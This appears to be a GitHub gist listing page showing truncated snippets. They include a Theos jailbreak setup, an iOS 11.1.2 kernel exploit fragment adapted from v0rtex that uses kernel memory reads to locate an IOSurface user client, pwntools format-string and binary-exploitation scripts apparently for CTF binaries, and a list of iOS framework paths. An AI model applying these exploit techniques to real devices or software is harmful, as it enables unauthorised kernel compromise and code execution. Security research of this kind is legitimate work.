This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
brew install dpkg ldid | |
cd ~ | |
git clone --recursive https://github.com/theos/theos.git | |
echo "export THEOS=~/theos" >> .bash_profile |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Offsets from iOS 11.1.2 iPhone 6+ | |
Insert the following after line 680 in async_wait.c | |
Mostly from Siguza's v0rtex | |
*/ | |
mach_ports_register(mach_task_self(), &user_client, 1); | |
uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list | |
uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); | |
uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
bin_path = "./fat_morphine" | |
payload = "" | |
payload += "%4196134x" # What we are writing | |
payload += "%{}$lln" # How we write it | |
payload += "\x30\x0d\x60" # Where we write it | |
payload = payload.format(10) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Added: | |
- /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer | |
- /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices | |
- /System/Library/Frameworks/CarPlay.framework/CarPlay | |
- /System/Library/Frameworks/CoreServices.framework/CoreServices | |
- /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib | |
- /System/Library/Frameworks/GLKit.framework/GLKit | |
- /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI | |
- /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector | |
- /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
bin_path = "./neo_boffy" | |
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries | |
context(log_level="ERROR") | |
# Can't send NULLs, but can send empty strings | |
def cmdify(str): return str.split("\x00") |
OlderNewer